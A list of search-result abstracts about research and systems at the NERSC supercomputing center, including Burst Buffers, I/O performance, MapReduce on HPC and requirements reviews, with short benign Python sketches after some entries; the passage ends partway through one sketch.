Sample records for computing center NERSC

  1. National Energy Research Scientific Computing Center

    Science.gov Websites


  2. Accelerating Science with the NERSC Burst Buffer Early User Program

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bhimji, Wahid; Bard, Debbie; Romanus, Melissa

    NVRAM-based Burst Buffers are an important part of the emerging HPC storage landscape. The National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory recently installed one of the first Burst Buffer systems as part of its new Cori supercomputer, collaborating with Cray on the development of the DataWarp software. NERSC has a diverse user base comprising more than 6,500 users in 700 different projects spanning a wide variety of scientific computing applications. The use cases for the Burst Buffer at NERSC are correspondingly broad and diverse. We describe here performance measurements and lessons learned from the Burst Buffer Early User Program at NERSC, which selected a number of research projects to gain early access to the Burst Buffer and exercise its capability to enable new scientific advancements. To the best of our knowledge, this is the first time a Burst Buffer has been stressed at scale by diverse, real user workloads, and these lessons will therefore be of considerable benefit in shaping the developing use of Burst Buffers at HPC centers.
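The stage-in/compute/stage-out cycle that a Burst Buffer enables can be sketched in a few lines. This is an illustrative model only: the function and path names are invented, and real DataWarp allocations are requested through batch-job directives rather than plain directory copies.

```python
import shutil
from pathlib import Path

def stage_job(input_file: Path, fast_tier: Path, slow_tier: Path, compute):
    """Illustrative stage-in / compute / stage-out cycle.

    `fast_tier` stands in for a burst-buffer allocation, `slow_tier` for the
    parallel file system; `compute` runs against the fast copy.
    """
    staged = fast_tier / input_file.name           # stage-in: PFS -> burst buffer
    shutil.copy2(input_file, staged)
    result = compute(staged)                       # job reads/writes the fast tier
    out = slow_tier / (input_file.stem + ".out")   # stage-out: burst buffer -> PFS
    out.write_text(result)
    return out
```

The point of the pattern is that the job's hot I/O touches only the fast tier; the parallel file system sees one copy in and one copy out.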

  3. Large Scale Computing and Storage Requirements for High Energy Physics

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Gerber, Richard A.; Wasserman, Harvey

    2010-11-24

    The National Energy Research Scientific Computing Center (NERSC) is the leading scientific computing facility for the Department of Energy's Office of Science, providing high-performance computing (HPC) resources to more than 3,000 researchers working on about 400 projects. NERSC provides large-scale computing resources and, crucially, the support and expertise needed for scientists to make effective use of them. In November 2009, NERSC, DOE's Office of Advanced Scientific Computing Research (ASCR), and DOE's Office of High Energy Physics (HEP) held a workshop to characterize the HPC resources needed at NERSC to support HEP research through the next three to five years. The effort is part of NERSC's legacy of anticipating users' needs and deploying resources to meet those demands. The workshop revealed several key points, in addition to achieving its goal of collecting and characterizing computing requirements. The chief findings: (1) Science teams need access to a significant increase in computational resources to meet their research goals; (2) Research teams need to be able to read, write, transfer, store online, archive, analyze, and share huge volumes of data; (3) Science teams need guidance and support to implement their codes on future architectures; and (4) Projects need predictable, rapid turnaround of their computational jobs to meet mission-critical time constraints. This report expands upon these key points and includes others. It also presents a number of case studies as representative of the research conducted within HEP. Workshop participants were asked to codify their requirements in this case study format, summarizing their science goals, methods of solution, current and three-to-five year computing requirements, and software and support needs. Participants were also asked to describe their strategy for computing in the highly parallel, multi-core environment that is expected to dominate HPC architectures over the next few years.
    The report includes a section that describes efforts already underway or planned at NERSC that address requirements collected at the workshop. NERSC has many initiatives in progress that address key workshop findings and are aligned with NERSC's strategic plans.

  4. Edison - A New Cray Supercomputer Advances Discovery at NERSC

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Dosanjh, Sudip; Parkinson, Dula; Yelick, Kathy

    2014-02-06

    When a supercomputing center installs a new system, users are invited to make heavy use of the computer as part of the rigorous testing. In this video, find out what top scientists have discovered using Edison, a Cray XC30 supercomputer, and how NERSC's newest supercomputer will accelerate their future research.

  5. Edison - A New Cray Supercomputer Advances Discovery at NERSC

    ScienceCinema

    Dosanjh, Sudip; Parkinson, Dula; Yelick, Kathy; Trebotich, David; Broughton, Jeff; Antypas, Katie; Lukic, Zarija; Borrill, Julian; Draney, Brent; Chen, Jackie

    2018-01-16

    When a supercomputing center installs a new system, users are invited to make heavy use of the computer as part of the rigorous testing. In this video, find out what top scientists have discovered using Edison, a Cray XC30 supercomputer, and how NERSC's newest supercomputer will accelerate their future research.

  6. Gyrokinetic micro-turbulence simulations on the NERSC 16-way SMP IBM SP computer: experiences and performance results

    NASA Astrophysics Data System (ADS)

    Ethier, Stephane; Lin, Zhihong

    2001-10-01

    Earlier this year, the National Energy Research Scientific Computing Center (NERSC) took delivery of the second most powerful computer in the world. With its 2,528 processors running at a peak performance of 1.5 GFlops each, this IBM SP machine has a theoretical peak of almost 3.8 TFlops. Efficiently harnessing such computing power in a single code is not an easy task and requires a good knowledge of the computer's architecture. Here we present the steps that we followed to improve our gyrokinetic micro-turbulence code GTC in order to take advantage of the new 16-way shared-memory nodes of the NERSC IBM SP. Performance results are shown, as well as details of the improved mixed-mode MPI-OpenMP model that we use. The enhancements to the code allowed us to tackle much bigger problem sizes, getting closer to our goal of simulating an ITER-size tokamak with both kinetic ions and electrons. (This work is supported by DOE Contract No. DE-AC02-76CH03073 (PPPL), and in part by the DOE Fusion SciDAC Project.)
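The mixed-mode idea the abstract describes, distributing work first across MPI ranks and then across OpenMP threads within each 16-way node, can be illustrated with a plain index-splitting sketch. The names and the two-level scheme here are illustrative only, not GTC's actual decomposition:

```python
def two_level_split(n: int, ranks: int, threads: int):
    """Split n grid points first across `ranks` (the MPI level), then
    across `threads` within each rank (the OpenMP level).

    Returns (rank, thread, lo, hi) tuples covering [0, n) exactly once.
    """
    chunks = []
    for r in range(ranks):
        r_lo = r * n // ranks            # this rank's slice of the domain
        r_hi = (r + 1) * n // ranks
        m = r_hi - r_lo
        for t in range(threads):
            t_lo = r_lo + t * m // threads        # thread's slice of the rank's slice
            t_hi = r_lo + (t + 1) * m // threads
            chunks.append((r, t, t_lo, t_hi))
    return chunks
```

In a real mixed-mode code the outer split is fixed by `MPI_Comm_rank` and the inner one by the OpenMP runtime; the arithmetic, however, is exactly this.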

  7. Python in the NERSC Exascale Science Applications Program for Data

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Ronaghi, Zahra; Thomas, Rollin; Deslippe, Jack

    We describe a new effort at the National Energy Research Scientific Computing Center (NERSC) in performance analysis and optimization of scientific Python applications targeting the Intel Xeon Phi (Knights Landing, KNL) manycore architecture. The Python-centered work outlined here is part of a larger effort called the NERSC Exascale Science Applications Program (NESAP) for Data. NESAP for Data focuses on applications that process and analyze high-volume, high-velocity data sets from experimental/observational science (EOS) facilities supported by the US Department of Energy Office of Science. We present three case study applications from NESAP for Data that use Python. These codes vary in terms of “Python purity” from applications developed in pure Python to ones that use Python mainly as a convenience layer for scientists without expertise in lower-level programming languages like C, C++, or Fortran. The science case, requirements, constraints, algorithms, and initial performance optimizations for each code are discussed. Our goal with this paper is to contribute to the larger conversation around the role of Python in high-performance computing today and tomorrow, highlighting areas for future work and emerging best practices.

  8. NERSC Annual Report 2008-2009

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Hules, John; Bashor, Jon; Vu, Linda

    2010-05-28

    This report presents highlights of the research conducted on NERSC computers in a variety of scientific disciplines during the years 2008-2009. It also reports on changes and upgrades to NERSC's systems and services as well as activities of NERSC staff.

  9. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Hules, John

    This 1998 annual report from the National Energy Research Scientific Computing Center (NERSC) presents the year in review of the following categories: Computational Science; Computer Science and Applied Mathematics; and Systems and Services. Also presented are science highlights in the following categories: Basic Energy Sciences; Biological and Environmental Research; Fusion Energy Sciences; High Energy and Nuclear Physics; and Advanced Scientific Computing Research and Other Projects.

  10. Science-Driven Computing: NERSC's Plan for 2006-2010

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Simon, Horst D.; Kramer, William T.C.; Bailey, David H.

    NERSC has developed a five-year strategic plan focusing on three components: Science-Driven Systems, Science-Driven Services, and Science-Driven Analytics. (1) Science-Driven Systems: Balanced introduction of the best new technologies for complete computational systems--computing, storage, networking, visualization and analysis--coupled with the activities necessary to engage vendors in addressing the DOE computational science requirements in their future roadmaps. (2) Science-Driven Services: The entire range of support activities, from high-quality operations and user services to direct scientific support, that enable a broad range of scientists to effectively use NERSC systems in their research. NERSC will concentrate on resources needed to realize the promise of the new highly scalable architectures for scientific discovery in multidisciplinary computational science projects. (3) Science-Driven Analytics: The architectural and systems enhancements and services required to integrate NERSC's powerful computational and storage resources to provide scientists with new tools to effectively manipulate, visualize, and analyze the huge data sets derived from simulations and experiments.

  11. Parallel Scaling Characteristics of Selected NERSC User Project Codes

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Skinner, David; Verdier, Francesca; Anand, Harsh

    This report documents parallel scaling characteristics of NERSC user project codes between Fiscal Year 2003 and the first half of Fiscal Year 2004 (Oct 2002-March 2004). The codes analyzed cover 60% of all the CPU hours delivered during that time frame on seaborg, a 6,080-CPU IBM SP and the largest parallel computer at NERSC. The scale of the workload, in terms of concurrency and problem size, is analyzed. Drawing on batch queue logs, performance data, and feedback from researchers, we detail the motivations, benefits, and challenges of implementing highly parallel scientific codes on current NERSC High Performance Computing systems. An evaluation and outlook of the NERSC workload for Allocation Year 2005 is presented.
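The kind of workload cut the report mentions, covering 60% of delivered CPU hours, can be sketched as a simple greedy selection over per-code usage totals. This is a hypothetical illustration of how such a cut might be chosen, not the authors' method:

```python
def coverage_set(usage: dict, target: float = 0.60):
    """Pick codes, largest CPU-hour consumers first, until they account
    for at least `target` of all delivered hours.

    `usage` maps code name -> CPU hours; returns (codes, fraction covered).
    """
    total = sum(usage.values())
    picked, acc = [], 0.0
    for code, hours in sorted(usage.items(), key=lambda kv: -kv[1]):
        if acc / total >= target:
            break
        picked.append(code)
        acc += hours
    return picked, acc / total
```

A handful of heavy codes typically dominates an HPC center's workload, which is why a small selection can cover most of the delivered hours.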

  12. Understanding Aprun Use Patterns

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Lin, Hwa-Chun Wendy

    2009-05-06

    On the Cray XT, aprun is the command to launch an application to a set of compute nodes reserved through the Application Level Placement Scheduler (ALPS). At the National Energy Research Scientific Computing Center (NERSC), interactive aprun is disabled. That is, invocations of aprun have to go through the batch system. Batch scripts can and often do contain several apruns, which either use subsets of the reserved nodes in parallel or use all reserved nodes in consecutive apruns. In order to better understand how NERSC users run on the XT, it is necessary to associate aprun information with jobs. This is surprisingly more challenging than it sounds. In this paper, we describe those challenges and how we solved them to produce daily per-job reports for completed apruns. We also describe additional uses of the data, e.g. adjusting charging policy accordingly or associating node failures with jobs/users, and plans for enhancements.
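The aprun-to-job association the abstract describes is at heart a log join. The sketch below is illustrative only: the log line formats are invented and do not match real ALPS or batch-system logs.

```python
import re

# Hypothetical line format (real ALPS logs differ):
#   "<timestamp> apid=<apid> batch_id=<jobid> cmd=<executable>"
APRUN_RE = re.compile(r"apid=(\d+)\s+batch_id=(\d+)\s+cmd=(\S+)")

def apruns_per_job(aprun_lines, job_ids):
    """Group aprun invocations under their batch job, the join needed
    to produce per-job reports of completed apruns."""
    report = {jobid: [] for jobid in job_ids}
    for line in aprun_lines:
        m = APRUN_RE.search(line)
        if not m:
            continue                       # skip lines that aren't aprun records
        apid, jobid, cmd = m.groups()
        report.setdefault(jobid, []).append((apid, cmd))
    return report
```

The real difficulty the paper reports lies upstream of this join: matching identifiers across log sources that were never designed to be correlated.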

  13. Using NERSC High-Performance Computing (HPC) systems for high-energy nuclear physics applications with ALICE

    NASA Astrophysics Data System (ADS)

    Fasel, Markus

    2016-10-01

    High-Performance Computing Systems are powerful tools tailored to support large-scale applications that rely on low-latency inter-process communications to run efficiently. By design, these systems often impose constraints on application workflows, such as limited external network connectivity and whole node scheduling, that make more general-purpose computing tasks, such as those commonly found in high-energy nuclear physics applications, more difficult to carry out. In this work, we present a tool designed to simplify access to such complicated environments by handling the common tasks of job submission, software management, and local data management, in a framework that is easily adaptable to the specific requirements of various computing systems. The tool, initially constructed to process stand-alone ALICE simulations for detector and software development, was successfully deployed on the NERSC computing systems, Carver, Hopper and Edison, and is being configured to provide access to the next generation NERSC system, Cori. In this report, we describe the tool and discuss our experience running ALICE applications on NERSC HPC systems. The discussion will include our initial benchmarks of Cori compared to other systems and our attempts to leverage the new capabilities offered with Cori to support data-intensive applications, with a future goal of full integration of such systems into ALICE grid operations.

  14. NERSC News

    Science.gov Websites

    MOTD: Deep Learning at 15 PFlops Enables Training for Extreme Weather Identification at Scale (March 29, 2018)

  15. High Performance Computing and Storage Requirements for Nuclear Physics: Target 2017

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Gerber, Richard; Wasserman, Harvey

    2014-04-30

    In April 2014, NERSC, ASCR, and the DOE Office of Nuclear Physics (NP) held a review to characterize high performance computing (HPC) and storage requirements for NP research through 2017. This review is the 12th in a series of reviews held by NERSC and Office of Science program offices that began in 2009. It is the second for NP, and the final in the second round of reviews that covered the six Office of Science program offices. This report is the result of that review.

  16. Exploring the role of pendant amines in transition metal complexes for the reduction of N2 to hydrazine and ammonia

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bhattacharya, Papri; Prokopchuk, Demyan E.; Mock, Michael T.

    2017-03-01

    This review examines the synthesis and acid reactivity of transition metal dinitrogen complexes bearing diphosphine ligands containing pendant amine groups in the second coordination sphere. This manuscript is a review of the work performed in the Center for Molecular Electrocatalysis. This work was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy (U.S. DOE), Office of Science, Office of Basic Energy Sciences. EPR studies on Fe were performed using EMSL, a national scientific user facility sponsored by the DOE’s Office of Biological and Environmental Research and located at PNNL. Computational resources were provided by the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. Pacific Northwest National Laboratory is operated by Battelle for the U.S. DOE.

  17. Integrating Grid Services into the Cray XT4 Environment

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    NERSC; Cholia, Shreyas; Lin, Hwa-Chun Wendy

    2009-05-01

    The 38,640-core Cray XT4 "Franklin" system at the National Energy Research Scientific Computing Center (NERSC) is a massively parallel resource available to Department of Energy researchers that also provides on-demand grid computing to the Open Science Grid. The integration of grid services on Franklin presented various challenges, including fundamental differences between the interactive and compute nodes, a stripped-down compute-node operating system without dynamic library support, a shared-root environment, and idiosyncratic application launching. In our work, we describe how we resolved these challenges on a running, general-purpose production system to provide on-demand compute, storage, accounting, and monitoring services through generic grid interfaces that mask the underlying system-specific details for the end user.

  18. Deploying Server-side File System Monitoring at NERSC

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Uselton, Andrew

    2009-05-01

    The Franklin Cray XT4 at the NERSC center was equipped with the server-side I/O monitoring infrastructure Cerebro/LMT, which is described here in detail. Insights gained from the data produced include a better understanding of instantaneous data rates during file system testing, file system behavior during regular production time, and long-term average behaviors. Information and insights gleaned from this monitoring support efforts to proactively manage the I/O infrastructure on Franklin. A simple model for I/O transactions is introduced and compared with the 250 million observations sent to the LMT database from August 2008 to February 2009.
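A minimal version of the rate computations such server-side monitoring supports, per-interval ("instantaneous") rates and a long-term average from cumulative byte counters, might look like the following. This is an illustrative sketch only; LMT's actual schema and aggregation are richer.

```python
def io_rates(samples):
    """samples: list of (t_seconds, cumulative_bytes) observations from a
    server-side monitor, in time order.

    Returns (per-interval rates in B/s, long-term average rate in B/s).
    """
    rates = []
    for (t0, b0), (t1, b1) in zip(samples, samples[1:]):
        rates.append((b1 - b0) / (t1 - t0))     # instantaneous rate per interval
    t_first, b_first = samples[0]
    t_last, b_last = samples[-1]
    avg = (b_last - b_first) / (t_last - t_first)  # long-term average
    return rates, avg
```

The gap between peak per-interval rates and the long-term average is exactly the kind of signal the abstract says the monitoring exposed.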

  19. The Hopper System: How the Largest XE6 in the World Went From Requirements to Reality.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Antypas, Katie; Butler, Tina; Carter, Jonathan

    This paper will discuss the entire process of acquiring and deploying Hopper from the first vendor market surveys to providing 3.8 million hours of production cycles per day for NERSC users. Installing the latest system at NERSC has been both a logistical and technical adventure. Balancing compute requirements with power, cooling, and space limitations drove the initial choice and configuration of the XE6, and a number of first-of-a-kind features implemented in collaboration with Cray have resulted in a high performance, usable, and reliable system.

  20. Relativistic Collisions of Highly-Charged Ions

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Ionescu, Dorin; Belkacem, Ali

    1998-11-19

    The physics of elementary atomic processes in relativistic collisions between highly-charged ions and atoms or other ions is briefly discussed, and some recent theoretical and experimental results in this field are summarized. They include excitation, capture, ionization, and electron-positron pair creation. The numerical solution of the two-center Dirac equation in momentum space is shown to be a powerful nonperturbative method for describing atomic processes in relativistic collisions involving heavy and highly-charged ions. By propagating negative-energy wave packets in time, the evolution of the QED vacuum around heavy ions in relativistic motion is investigated. Recent results obtained from numerical calculations using massively parallel processing on the Cray T3E supercomputer of the National Energy Research Scientific Computing Center (NERSC) at Berkeley National Laboratory are presented.

  1. Planck Surveyor On Its Way to Orbit

    ScienceCinema

    None

    2017-12-09

    An Ariane 5 rocket carried the Planck Surveyor and a companion satellite into space May 14, 2009 from the European Space Agency (ESA) base on the northeast coast of South America. Once in orbit beyond the moon, Planck will produce the most accurate measurements ever made of the relic radiation from the big bang, plus the largest set of CMB data ever recorded. Berkeley Lab's long and continuing involvement with Planck began when George Smoot of the Physics Division proposed Planck's progenitor to ESA, and continues with preparations for ongoing data analysis for the U.S. Planck team at NERSC, led by Julian Borrill, co-leader of the Computational Cosmology Center.

  2. Transport properties of two-dimensional metal-phthalocyanine junctions: An ab initio study

    NASA Astrophysics Data System (ADS)

    Liu, Shuang-Long; Wang, Yun-Peng; Li, Xiang-Guo; Cheng, Hai-Ping

    We study two-dimensional (2D) electronic/spintronic junctions made of metal-organic frameworks via first-principles simulation. The system consists of two Mn-phthalocyanine leads and a Ni-phthalocyanine center. A 2D Mn-phthalocyanine sheet is a ferromagnetic half metal, and a 2D Ni-phthalocyanine sheet is a nonmagnetic semiconductor. Our results show that this system has a large tunneling magnetoresistance. The transmission coefficient at the Fermi energy decays exponentially with the length of the central region, which is not surprising. However, the transmission of the junction can be tuned by up to two orders of magnitude using a gate voltage. The origin of the change lies in the mode matching between the lead and center electronic states. Moreover, the threshold gate voltage varies with the length of the center region, which provides a way of engineering the transport properties. Finally, we combine the non-equilibrium Green's function approach with the Boltzmann transport equation to compute the conductance of the junction. This work was supported by the US Department of Energy (DOE), Office of Basic Energy Sciences (BES), under Contract No. DE-FG02-02ER45995. Computations were done using the utilities of NERSC and University of Florida Research Computing.

  3. Structure and Dynamics of Ionic Block co-Polymer Melts: Computational Study

    NASA Astrophysics Data System (ADS)

    Aryal, Dipak; Perahia, Dvora; Grest, Gary S.

    Tethering ionomer blocks into co-polymers enables engineering of polymeric systems designed to encompass transport while controlling structure. Here the structure and dynamics of symmetric pentablock copolymer melts are probed by fully atomistic molecular dynamics simulations. The center block consists of randomly sulfonated polystyrene with sulfonation fractions f = 0 to 0.55, tethered to a hydrogenated polyisoprene (PI), end-capped with poly(t-butyl styrene). We find that melts with f = 0.15 and 0.30 consist of isolated ionic clusters, whereas melts with f = 0.55 exhibit a long-range percolating ionic network. Similar to polystyrene sulfonate, a small number of ionic clusters slows the mobility of the center of mass of the co-polymer; however, formation of the ionic clusters is slower, and they are often intertwined with PI segments. Surprisingly, the segmental dynamics of the other blocks are also affected. NSF DMR-1611136; NERSC; Palmetto Cluster, Clemson University; Kraton Polymers US, LLC.

  4. Resource-Efficient, Hierarchical Auto-Tuning of a Hybrid Lattice Boltzmann Computation on the Cray XT4

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Computational Research Division, Lawrence Berkeley National Laboratory; NERSC, Lawrence Berkeley National Laboratory; Computer Science Department, University of California, Berkeley

    2009-05-04

    We apply auto-tuning to a hybrid MPI-pthreads lattice Boltzmann computation running on the Cray XT4 at the National Energy Research Scientific Computing Center (NERSC). Previous work showed that multicore-specific auto-tuning can improve the performance of lattice Boltzmann magnetohydrodynamics (LBMHD) by a factor of 4x when running on dual- and quad-core Opteron dual-socket SMPs. We extend these studies to the distributed memory arena via a hybrid MPI/pthreads implementation. In addition to conventional auto-tuning at the local SMP node, we tune at the message-passing level to determine the optimal aspect ratio as well as the correct balance between MPI tasks and threads per MPI task. Our study presents a detailed performance analysis when moving along an isocurve of constant hardware usage: fixed total memory, total cores, and total nodes. Overall, our work points to approaches for improving intra- and inter-node efficiency on large-scale multicore systems for demanding scientific applications.
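The isocurve the study sweeps, holding total cores fixed while varying the MPI-task/thread split, can be enumerated directly. This is a trivial sketch of the search space, not the authors' tuning harness:

```python
def isocurve_configs(total_cores: int):
    """All (MPI tasks, threads per task) splits that use exactly
    `total_cores` cores -- the tuning axis swept when balancing
    message-passing ranks against threads."""
    return [(total_cores // t, t)
            for t in range(1, total_cores + 1)
            if total_cores % t == 0]
```

An auto-tuner would benchmark the application at each configuration on this list (and at each candidate aspect ratio) and keep the fastest.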

  5. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Koniges, A.E.

    The author describes the new T3D parallel computer at NERSC. The adaptive mesh ICF3D code is one of the current applications being ported and developed for use on the T3D. It has been stressed in other papers in these proceedings that the development environment and tools available on the parallel computer are similar to any planned for the future, including networks of workstations.

  6. Ammonia Oxidation by Abstraction of Three Hydrogen Atoms from a Mo–NH 3 Complex

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bhattacharya, Papri; Heiden, Zachariah M.; Wiedner, Eric S.

    We report ammonia oxidation by homolytic cleavage of all three H atoms from a Mo-15NH3 complex using the 2,4,6-tri-tert-butylphenoxyl radical to afford a Mo-alkylimido (Mo=15NR) complex (R = 2,4,6-tri-t-butylcyclohexa-2,5-dien-1-one). Reductive cleavage of Mo=15NR generates a terminal Mo≡N nitride, and a [Mo-15NH]+ complex is formed by protonation. Computational analysis describes the energetic profile for the stepwise removal of three H atoms from the Mo-15NH3 complex and the formation of Mo=15NR. Acknowledgment. This work was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy (U.S. DOE), Office of Science, Office of Basic Energy Sciences. EPR and mass spectrometry experiments were performed using EMSL, a national scientific user facility sponsored by the DOE’s Office of Biological and Environmental Research and located at PNNL. The authors thank Dr. Eric D. Walter and Dr. Rosalie Chu for assistance in performing EPR and mass spectrometry analysis, respectively. Computational resources were provided by the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. Pacific Northwest National Laboratory is operated by Battelle for the U.S. DOE.

  7. HF Surface Wave Radar for Oceanography -- A Review of Activities in Germany

    DTIC Science & Technology

    2005-04-14

    Environmental and Remote Sensing Center (NERSC). The model and data assimilation technique is described by Breivik and Sætra [2]. Figure 10 shows a...forecasts with the measurements taken at that time, the rms error increases to 20 cm/s. Breivik and Sætra, 2001, present scatter plots and correlations

  8. The Magellan Final Report on Cloud Computing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Coghlan, Susan; Yelick, Katherine

    The goal of Magellan, a project funded through the U.S. Department of Energy (DOE) Office of Advanced Scientific Computing Research (ASCR), was to investigate the potential role of cloud computing in addressing the computing needs for the DOE Office of Science (SC), particularly related to serving the needs of mid-range computing and future data-intensive computing workloads. A set of research questions was formed to probe various aspects of cloud computing, covering performance, usability, and cost. To address these questions, a distributed testbed infrastructure was deployed at the Argonne Leadership Computing Facility (ALCF) and the National Energy Research Scientific Computing Center (NERSC). The testbed was designed to be flexible and capable enough to explore a variety of computing models and hardware design points in order to understand the impact for various scientific applications. During the project, the testbed also served as a valuable resource to application scientists. Applications from a diverse set of projects such as MG-RAST (a metagenomics analysis server), the Joint Genome Institute, the STAR experiment at the Relativistic Heavy Ion Collider, and the Laser Interferometer Gravitational Wave Observatory (LIGO) were used by the Magellan project for benchmarking within the cloud, but the project teams were also able to accomplish important production science utilizing the Magellan cloud resources.

  9. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Fadika, Zacharia; Dede, Elif; Govindaraju, Madhusudhan

    MapReduce is increasingly becoming a popular framework, and a potent programming model. The most popular open source implementation of MapReduce, Hadoop, is based on the Hadoop Distributed File System (HDFS). However, as HDFS is not POSIX compliant, it cannot be fully leveraged by applications running on a majority of existing HPC environments such as TeraGrid and NERSC. These HPC environments typically support globally shared file systems such as NFS and GPFS. On such resourceful HPC infrastructures, the use of Hadoop not only creates compatibility issues, but also affects overall performance due to the added overhead of the HDFS. This paper not only presents a MapReduce implementation directly suitable for HPC environments, but also exposes the design choices for better performance gains in those settings. By leveraging inherent distributed file systems' functions, and abstracting them away from its MapReduce framework, MARIANE (MApReduce Implementation Adapted for HPC Environments) not only allows for the use of the model in an expanding number of HPC environments, but also allows for better performance in such settings. This paper shows the applicability and high performance of the MapReduce paradigm through MARIANE, an implementation designed for clustered and shared-disk file systems and as such not dedicated to a specific MapReduce solution. The paper identifies the components and trade-offs necessary for this model, and quantifies the performance gains exhibited by our approach in distributed environments over Apache Hadoop in a data intensive setting, on the Magellan testbed at the National Energy Research Scientific Computing Center (NERSC).
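The core MapReduce model that MARIANE implements can be sketched in a few lines of Python. This toy in-process version (word count) is illustrative only and is not MARIANE's code; the point is that nothing in the model itself requires HDFS — on a shared file system the input records can simply be lines of an ordinary file.

```python
from collections import defaultdict

def map_reduce(records, mapper, reducer):
    """Minimal MapReduce core: map each record to (key, value) pairs,
    shuffle (group) by key, then reduce each key's value list."""
    groups = defaultdict(list)
    for rec in records:
        for k, v in mapper(rec):   # map phase
            groups[k].append(v)    # shuffle: group values by key
    return {k: reducer(k, vs) for k, vs in groups.items()}  # reduce phase

# Word count, the canonical example:
def wc_map(line):
    return [(word, 1) for word in line.split()]

def wc_reduce(word, counts):
    return sum(counts)
```

A real framework distributes the map and reduce phases across nodes and makes the shuffle a parallel, fault-tolerant data exchange; the data flow is the same.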

  10. Computational Science: A Research Methodology for the 21st Century

    NASA Astrophysics Data System (ADS)

    Orbach, Raymond L.

    2004-03-01

    Computational simulation - a means of scientific discovery that employs computer systems to simulate a physical system according to laws derived from theory and experiment - has attained peer status with theory and experiment. Important advances in basic science are accomplished by a new "sociology" for ultrascale scientific computing capability (USSCC), a fusion of sustained advances in scientific models, mathematical algorithms, computer architecture, and scientific software engineering. Expansion of current capabilities by factors of 100-1000 opens up new vistas for scientific discovery: long-term climatic variability and change, macroscopic material design from correlated behavior at the nanoscale, design and optimization of magnetic confinement fusion reactors, strong interactions on a computational lattice through quantum chromodynamics, and stellar explosions and element production. The "virtual prototype," made possible by this expansion, can markedly reduce time-to-market for industrial applications such as jet engines and safer, more fuel-efficient, cleaner cars. In order to develop USSCC, the National Energy Research Scientific Computing Center (NERSC) announced the competition "Innovative and Novel Computational Impact on Theory and Experiment" (INCITE), with no requirement for current DOE sponsorship. Fifty-nine proposals for grand challenge scientific problems were submitted for a small number of awards. The successful grants, and their preliminary progress, will be described.

  11. Extended Subject Access to Hypertext Online Documentation. Parts I and II: The Search-Support and Maintenance Problems.

    ERIC Educational Resources Information Center

    Girill, T. R.; And Others

    1991-01-01

    Describes enhancements made to a hypertext information retrieval system at the National Energy Research Supercomputer Center (NERSC) called DFT (Document, Find, and Theseus). The enrichment of DFT's entry vocabulary is described, DFT and other hypertext systems are compared, and problems that occur due to the need for frequent updates are…

  12. Evaluating the networking characteristics of the Cray XC-40 Intel Knights Landing-based Cori supercomputer at NERSC

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Doerfler, Douglas; Austin, Brian; Cook, Brandon

    There are many potential issues associated with deploying the Intel Xeon Phi™ (code named Knights Landing [KNL]) manycore processor in a large-scale supercomputer. One in particular is the ability to fully utilize the high-speed communications network, given that the serial performance of a Xeon Phi™ core is a fraction of that of a Xeon® core. In this paper, we examine the trade-offs associated with allocating enough cores to fully utilize the Aries high-speed network versus dedicating those cores to computation, e.g., the trade-off between MPI and OpenMP. In addition, we evaluate new features of Cray MPI in support of KNL, such as internode optimizations. We also evaluate one-sided programming models such as Unified Parallel C. We quantify the impact of the above trade-offs and features using a suite of National Energy Research Scientific Computing Center applications.
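The MPI-versus-OpenMP trade-off described above is, at its simplest, a question of how to factor a node's cores. A small sketch (assuming the 68-core KNL configuration used in Cori; the helper function itself is hypothetical, not from the paper):

```python
def rank_thread_splits(cores=68, reserve=0):
    # Enumerate (MPI ranks, OpenMP threads per rank) pairs that exactly
    # fill the cores left over after reserving some for network/progress
    # work. Every core handed to communication shrinks the compute budget,
    # which is the trade-off the paper quantifies.
    usable = cores - reserve
    return [(r, usable // r) for r in range(1, usable + 1) if usable % r == 0]
```

For example, with no cores reserved a 68-core node admits only six exact splits (68 = 2 x 2 x 17), such as (4 ranks, 17 threads); reserving 4 cores for network progress leaves 64 and allows power-of-two splits like (8, 8).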

  13. Understanding the I/O Performance Gap Between Cori KNL and Haswell

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Liu, Jialin; Koziol, Quincey; Tang, Houjun

    2017-05-01

    The Cori system at NERSC has two compute partitions with different CPU architectures: a 2,004-node Haswell partition and a 9,688-node KNL partition, which ranked as the 5th most powerful supercomputer on the November 2016 Top 500 list. The compute partitions share a common storage configuration, and understanding the IO performance gap between them is important not only to NERSC/LBNL users and other national labs, but also to the relevant hardware vendors and software developers. In this paper, we comprehensively analyze single-core and single-node IO performance on the Haswell and KNL partitions, and identify the major bottlenecks, which include CPU frequency and memory-copy performance. We also extend our performance tests to multi-node IO and reveal the IO cost differences caused by network latency, buffer size, and communication cost. Overall, we develop a strong understanding of the IO gap between Haswell and KNL nodes, and the lessons learned from this exploration will guide us in designing optimal IO solutions for the many-core era.
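Single-core IO measurements of the kind the paper reports can be approximated with a timed sequential write. This is an illustrative microbenchmark sketch, not the authors' test harness; sizes and block lengths are arbitrary choices.

```python
import os
import tempfile
import time

def write_bandwidth_mb_s(path, size_mb=16, block_kb=1024):
    # Sequential buffered write, flushed and fsync'ed so the timing is not
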